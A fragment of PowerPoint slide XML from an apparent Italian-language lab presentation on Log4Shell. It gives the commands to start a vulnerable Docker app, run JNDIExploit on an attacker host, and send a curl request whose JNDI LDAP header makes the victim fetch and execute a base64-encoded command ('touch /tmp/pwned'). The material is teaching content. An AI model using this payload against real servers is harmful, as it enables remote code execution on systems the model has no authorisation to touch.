              </a:rPr>
              <a:t>Gestisce diversi tipi di payload,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> nel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>nostro caso useremo il payload: Basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/Base64/comando_in_base64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Genera automaticamente una classe java che esegue il comando da noi inviato</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Hosting della classe generata con invio del suo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> alla macchina vittima</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2765161460"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435970" y="245203"/>
            <a:ext cx="7169150" cy="54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t-IT" sz="3400" dirty="0"/>
              <a:t>Esempio 1: Creazione di un file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>13</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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2" name="CasellaDiTesto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C626433B-5B8A-A788-44C3-8ECC86CC24E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111581" y="1244489"/>
            <a:ext cx="7817930" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> --name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>-app --network="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>" -p 8080:8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>ghcr.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>christophetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>/log4shell-vulnerable-app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="CasellaDiTesto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06CDE1E3-5F01-4995-EC2C-5C37A951E435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111581" y="846884"/>
            <a:ext cx="6429397" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Avvio della macchina vulnerabile tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: 10.0.2.4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CasellaDiTesto 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E0264A2-06D1-F8EC-B744-C56FB1D0A929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111581" y="1928726"/>
            <a:ext cx="6584432" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Avvio del server LDAP sulla macchina dell’attaccante (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: 10.0.2.15)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="CasellaDiTesto 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F84CAB75-BB13-DF6A-2241-0A9B7260294E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111581" y="2250531"/>
            <a:ext cx="7817930" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>java -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> JNDIExploit-1.2-SNAPSHOT.jar -i  10.0.2.15 -p 8888</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="CasellaDiTesto 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49351FBE-5AED-5596-A091-52E4FEE5D413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1034063" y="3844227"/>
            <a:ext cx="6584432" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Tramite il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> effettuiamo una richiesta verso il server vittima</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="CasellaDiTesto 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87055046-F5E9-D546-BB31-62821F5CB998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111581" y="4241831"/>
            <a:ext cx="7817929" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> 10.0.2.4:8080 -H 'X-Api-Version: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>://10.0.2.15:1389/Basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="CasellaDiTesto 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7118B1-43E3-C532-D0BB-48BB7C702BED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1034063" y="2718028"/>
            <a:ext cx="6584432" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Convertiamo il comando touch /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>pwned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  in base64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="CasellaDiTesto 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C637A799-0A76-E05F-E7F5-C3B95C2DC909}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111581" y="3060650"/>
            <a:ext cx="7817929" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> –n ’touch /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>pwned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>’ | base64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>dG91Y2ggL3RtcC9wd25lZAo=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387928815"/>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5" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>14</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B841AF1D-72E2-56F3-2E8E-E14330F223F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632939" y="1239185"/>
            <a:ext cx="3878120" cy="1116428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="CasellaDiTesto 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B86E9F24-B81E-6110-BBB8-8EBE035107EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3541455" y="846884"/>
            <a:ext cx="2061087" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
